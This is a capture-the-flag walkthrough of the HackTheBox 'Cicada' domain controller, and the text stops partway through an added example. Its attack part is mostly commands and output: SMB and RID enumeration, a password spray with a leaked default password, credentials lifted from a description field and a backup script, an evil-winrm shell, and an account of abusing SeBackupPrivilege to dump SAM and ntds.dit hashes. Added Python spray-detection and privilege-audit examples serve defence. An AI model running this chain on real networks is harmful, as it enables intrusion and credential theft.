Windows Life from Zero - Cicada

Sweet dreams are made of this
Who am I to disagree?
Travel the world and the seven seas
Everybody’s looking for something


Target IP: 10.129.254.81

Difficulty: Easy

Topics covered: SMB share enumeration, SMB user enumeration, password spraying, abuse of a Backup Operators group member, hash dumping


Information gathering

Nmap full port scan

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- -Pn --min-rate=1000 10.129.254.81
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 04:11 EST
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 96.62% done; ETC: 04:13 (0:00:04 remaining)
Nmap scan report for 10.129.254.81
Host is up (0.14s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
64756/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 124.16 seconds
```

Nmap detailed scan

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -A -sV -sC -p53,88,135,139,389,445,464,593,636,3268,3269 --min-rate=1000 10.129.254.81
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 04:15 EST
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:16 (0:00:00 remaining)
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.77% done; ETC: 04:16 (0:00:00 remaining)
Nmap scan report for 10.129.254.81
Host is up (0.12s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-12 16:15:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-12T16:17:02+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-01-12T16:16:22
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m01s

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 135.57 ms 10.10.14.1
2 135.70 ms 10.129.254.81

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.38 seconds
```

Add the target's domain names to /etc/hosts

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "10.129.254.81 CICADA-DC CICADA-DC.htb cicada.htb cicada-dc CICADA-DC.cicada.htb" | tee -a /etc/hosts
10.129.254.81 CICADA-DC CICADA-DC.htb cicada.htb cicada-dc CICADA-DC.cicada.htb
```

SMB share enumeration

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.254.81
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.254.81 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

An unusual share name, HR, shows up; probe it further.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //10.129.254.81/HR
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024

4168447 blocks of size 4096. 459560 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \>
```

There is a notice file; download it and read it.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat Notice\ from\ HR.txt

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
```

This gives us the standard default password. Because the Guest account is enabled, we can use it to enumerate the SIDs of the other users in the domain and build a username list for user enumeration.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u guest -p '' --rid-brute
SMB 10.129.254.81 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.254.81 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.254.81 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.254.81 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.254.81 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.254.81 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.254.81 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.254.81 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.254.81 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.254.81 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
```

nxc was used here, but impacket's lookupsid works just as well.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
```

Collect the SidTypeUser entries into a username wordlist (users.txt).

```
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

Next, password spray with the default password to find the users who never changed it.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.254.81 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.254.81 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.254.81 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.254.81 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.254.81 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.254.81 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.254.81 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.254.81 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
```
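From the defender's side, the spray above leaves a distinctive trail in the domain controller's Security log: one source address failing (Event ID 4625) against many different accounts within a few seconds, one attempt per account, followed by a success (Event ID 4624) for the account whose password matched. The following Python is an added example written for this page, not code from the original writeup or from nxc; it reads constructed event records reduced to four fields from the 4625/4624 schema (TimeCreated, EventID, TargetUserName, IpAddress) and flags that shape while ignoring a user who repeatedly mistypes their own password.

```python
"""Detect the password-spray pattern in Security log records.

Added example, not part of the original writeup. A spray tries one
password against many accounts, so a single source produces failures
(4625) for many distinct accounts in a short window with one or two
tries each; a forgotten password produces many failures against one
account. The event data below is constructed; real records would come
from an EVTX/XML export or a SIEM, with the same field names.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.10.14.7 is a made-up source address; the account
# names are the ones enumerated above. Last record group is a normal user
# mistyping his own password twice, which must not alert.
SAMPLE_EVENTS = """\
2026-01-12T16:20:01 4625 Administrator 10.10.14.7
2026-01-12T16:20:01 4625 Guest 10.10.14.7
2026-01-12T16:20:02 4625 krbtgt 10.10.14.7
2026-01-12T16:20:02 4625 CICADA-DC$ 10.10.14.7
2026-01-12T16:20:03 4625 john.smoulder 10.10.14.7
2026-01-12T16:20:03 4625 sarah.dantelia 10.10.14.7
2026-01-12T16:20:04 4624 michael.wrightson 10.10.14.7
2026-01-12T16:25:10 4625 david.orelious 10.129.1.50
2026-01-12T16:25:31 4625 david.orelious 10.129.1.50
2026-01-12T16:25:55 4624 david.orelious 10.129.1.50
"""


def parse_events(text):
    """Parse 'timestamp event_id target_user source_ip' lines into dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, user, ip = line.split()
        events.append({"time": datetime.fromisoformat(ts),
                       "event_id": int(event_id), "user": user, "ip": ip})
    return events


def detect_spray(events, window=timedelta(minutes=5),
                 min_accounts=5, max_per_account=2):
    """Return {source_ip: {"accounts": [...], "succeeded": [...]}}.

    A source is flagged when, inside any `window`, its 4625 failures cover
    at least `min_accounts` distinct accounts with no more than
    `max_per_account` attempts each.
    """
    failures = defaultdict(list)
    successes = defaultdict(set)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] == 4625:
            failures[ev["ip"]].append(ev)
        elif ev["event_id"] == 4624:
            successes[ev["ip"]].add(ev["user"])

    findings = {}
    for ip, fails in failures.items():
        sprayed = set()
        start = 0
        for end in range(len(fails)):
            # Advance the window start until fails[start:end+1] fits in `window`.
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            counts = defaultdict(int)
            for ev in fails[start:end + 1]:
                counts[ev["user"]] += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                sprayed.update(counts)
        if sprayed:
            findings[ip] = {
                "accounts": sorted(sprayed),
                # Accounts that authenticated from the same source during the
                # spray: the ones whose password was guessed. Reset these first.
                "succeeded": sorted(successes.get(ip, set())),
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"{ip}: sprayed {len(info['accounts'])} accounts, "
              f"succeeded on {info['succeeded'] or 'none'}")
```

The thresholds (five accounts in five minutes, at most two tries per account) are a starting point to tune against the environment's normal failure rate; on a DC, the equivalent NTLM validation events (4776) carry the same account and source fields and can be fed through the same function.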

michael.wrightson never changed his password. Check whether he can log in over WinRM. Having the password is not enough on its own: if the account is not in the Remote Management Users group, remote login will fail, and we will have to keep digging into what he can reach over SMB.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
WINRM 10.129.254.81 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.254.81 5985 CICADA-DC [-] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
```

That does not work, so use his identity to list the other users and the shares instead.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.129.254.81 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.254.81 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.254.81 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.254.81 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.129.254.81 445 CICADA-DC Guest 2024-08-28 17:26:56 1 Built-in account for guest access to the computer/domain
SMB 10.129.254.81 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.129.254.81 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
SMB 10.129.254.81 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.129.254.81 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.129.254.81 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.129.254.81 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0
SMB 10.129.254.81 445 CICADA-DC [*] Enumerated 8 local users: CICADA

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.254.81 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.254.81 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.254.81 445 CICADA-DC [*] Enumerated shares
SMB 10.129.254.81 445 CICADA-DC Share Permissions Remark
SMB 10.129.254.81 445 CICADA-DC ----- ----------- ------
SMB 10.129.254.81 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.254.81 445 CICADA-DC C$ Default share
SMB 10.129.254.81 445 CICADA-DC DEV
SMB 10.129.254.81 445 CICADA-DC HR READ
SMB 10.129.254.81 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.254.81 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.254.81 445 CICADA-DC SYSVOL READ Logon server share
```

Two valuable pieces of information come out of this. First, a user named david.orelious has written his password, aRt$Lp#7t*VQ!3, into his account description. Second, listing the shares as michael.wrightson shows the DEV share, but he cannot read it.

So try again as the newly found user david.orelious.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.254.81 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.254.81 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.254.81 445 CICADA-DC [*] Enumerated shares
SMB 10.129.254.81 445 CICADA-DC Share Permissions Remark
SMB 10.129.254.81 445 CICADA-DC ----- ----------- ------
SMB 10.129.254.81 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.254.81 445 CICADA-DC C$ Default share
SMB 10.129.254.81 445 CICADA-DC DEV READ
SMB 10.129.254.81 445 CICADA-DC HR READ
SMB 10.129.254.81 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.254.81 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.254.81 445 CICADA-DC SYSVOL READ Logon server share
```

It is readable, so enter the share and look at its files.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -U 'david.orelious' //10.129.254.81/DEV
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024

4168447 blocks of size 4096. 481778 blocks available
smb: \> get "Backup_script.ps1"
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \>
```

There is a file named Backup_script.ps1; read it.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```

USER


This yields credentials for emily.oscars; check whether she has WinRM access.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.254.81 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.254.81 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
```

She does, so log in with evil-winrm.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i cicada-dc.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
```

Check the current user's identity, groups and privileges

```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
```

She is a member of Backup Operators, so the SAM and SYSTEM hives can be backed up and downloaded.

SeBackupPrivilege (Back up files and directories) is a Windows privilege that lets a user bypass file and directory permissions in order to read files for backup purposes.

When the output of whoami /priv shows SeBackupPrivilege with the state Enabled, the current user can read any file on the system, including sensitive files locked down to Administrator or SYSTEM.

A more detailed explanation of the privilege and what it means for security:

1. What does it do?

  • Official definition: the privilege grants the ability to read all files for backup purposes, regardless of how the files' access control lists (ACLs) are set.
  • Design intent: it exists so that backup software (such as Windows Server Backup) or members of the "Backup Operators" group can back up the entire system, including core files locked by the operating system.
  • Permission bypass: a user holding this privilege can read files they would otherwise have no access to (other users' private folders, system configuration files, and so on).

2. Why is it a high-risk privilege escalation vector?

In an attack or a penetration test (such as the HackTheBox machine Cicada), if a non-administrator account (such as emily.oscars) holds this privilege, an attacker can use it to reach the highest privilege level (SYSTEM):

  1. Access to sensitive registry hives: the privilege allows reading and copying Windows's core registry hives, in particular SAM (Security Account Manager) and SYSTEM.
    • SAM contains the local users' password hashes (NTLM hashes).
    • SYSTEM contains the boot key needed to decrypt the SAM file.
  2. Access to the domain database: on a domain controller, the attacker can also copy the ntds.dit file, which holds the hashes of every user in Active Directory.
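The `whoami /all` output above is also exactly what an administrator reviews when checking an account against least privilege: a non-administrator in Backup Operators, or holding SeBackupPrivilege or SeRestorePrivilege, should be a finding. The following Python is an added example written for this page, not code from the original writeup or from Windows; it parses the text layout `whoami /all` prints, using the `====` underline to derive the column boundaries (when an entry fills its column the next one follows after a single space, so splitting on whitespace would break), and flags the groups and privileges that let a user read or write beyond its ACLs. The sample dump and the two risk tables are constructed for this example.

```python
"""Least-privilege audit of a `whoami /all` dump.

Added example, not part of the original writeup. It parses the fixed-width
tables `whoami /all` prints (same layout as the emily.oscars output above)
and reports group memberships and privileges that let a non-administrator
read or write past ACLs. SAMPLE_WHOAMI is constructed; RISKY_GROUP_SIDS and
RISKY_PRIVILEGES are a shortlist written for this example, not a Windows
policy.
"""
import re

SECTIONS = {"GROUP INFORMATION": "groups", "PRIVILEGES INFORMATION": "privileges"}

# Built-in groups whose members can escalate. Keyed by SID because the
# display name depends on the system locale.
RISKY_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-551": "Backup Operators: token carries SeBackupPrivilege and SeRestorePrivilege",
    "S-1-5-32-549": "Server Operators: can reconfigure services on domain controllers",
    "S-1-5-32-548": "Account Operators: can modify most user and group accounts",
}

# Privileges that by themselves allow reading or writing past ACLs, or
# taking over other processes.
RISKY_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of ACL (SAM and SYSTEM hives, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeDebugPrivilege": "open any process, including those running as SYSTEM",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}

# Constructed sample modelled on the output above; columns are padded with
# spaces exactly as whoami prints them (raw string because of the backslashes).
SAMPLE_WHOAMI = r"""USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                      Type             SID          Attributes
=============================== ================ ============ ==================================================
Everyone                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
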